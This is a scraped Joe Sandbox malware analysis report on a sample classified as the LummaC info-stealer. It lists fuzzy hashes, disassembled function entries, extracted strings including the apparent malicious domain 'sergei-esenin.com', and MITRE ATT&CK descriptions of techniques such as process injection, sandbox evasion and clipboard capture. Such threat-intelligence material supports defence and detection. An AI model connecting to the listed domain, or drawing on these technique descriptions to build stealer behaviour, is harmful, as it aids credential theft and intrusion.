Opcode Fuzzy Hash: 49c0a2cb97f524fbd81d4bf2b8e1c06be9cefa8b60d4d32dccc500cda34a5789
Instruction Fuzzy Hash: 0E900220E88141C781048E009180479E379D38B151F60F50080083300D4670F455454D

Function 026CDCF0 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 307COMMON

Download Yara Rule

Strings

"#, xrefs: 026CE079
|nkx, xrefs: 026CDD9A
xq, xrefs: 026CDF99
sergei-esenin.com, xrefs: 026CE11C
tjch, xrefs: 026CDD8F
3m, xrefs: 026CDFA4
c|{h, xrefs: 026CDDA5

Memory Dump Source

Source File: 00000002.00000002.1753793209.00000000026C1000.00000020.00000400.00020000.00000000.sdmp, Offset: 026C0000, based on PE: true

Associated: 00000002.00000002.1753777336.00000000026C0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753826067.0000000002700000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753847367.0000000002703000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1753866432.0000000002712000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_26c0000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: "#$3m$c|{h$sergei-esenin.com$tjch$xq$|nkx
API String ID: 0-2312890552
Opcode ID: f05c25b9b9888a5496a72469c874f2d48f025d8b8c567ae7a21dd5f56eb46f01
Instruction ID: 1fd945a5080b165ea20ca3d352dedd2e183da3384cf342571362074606adbd79
Opcode Fuzzy Hash: f05c25b9b9888a5496a72469c874f2d48f025d8b8c567ae7a21dd5f56eb46f01
Instruction Fuzzy Hash: 79B133B050E3D08BE331DF288498BAFBBF5FB9A304F144A9CD8C95B251C73599058B96

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exe

Function 026CB810 Relevance: 14.6, APIs: 2, Strings: 6, Instructions: 601
COMMON

Function 026CCC80 Relevance: 14.6, Strings: 11, Instructions: 842
COMMON

Function 026F681D Relevance: 13.9, APIs: 9, Instructions: 405
memoryCOMMON

Function 026F65E0 Relevance: 1.6, APIs: 1, Instructions: 88
comCOMMON

Function 026FC800 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Function 026CA9A0 Relevance: 4.5, APIs: 3, Instructions: 34
COMMON

Function 026FC63D Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 205
memoryCOMMON

Function 026F566A Relevance: 3.1, APIs: 2, Instructions: 80
COMMON

Function 026F680F Relevance: 3.0, APIs: 2, Instructions: 34
COMMON

Function 026FC070 Relevance: 1.8, APIs: 1, Instructions: 300
COMMON

Function 026FC696 Relevance: 1.7, APIs: 1, Instructions: 236
COMMON

Function 026F6728 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Function 026FA762 Relevance: 1.5, APIs: 1, Instructions: 7
memoryCOMMON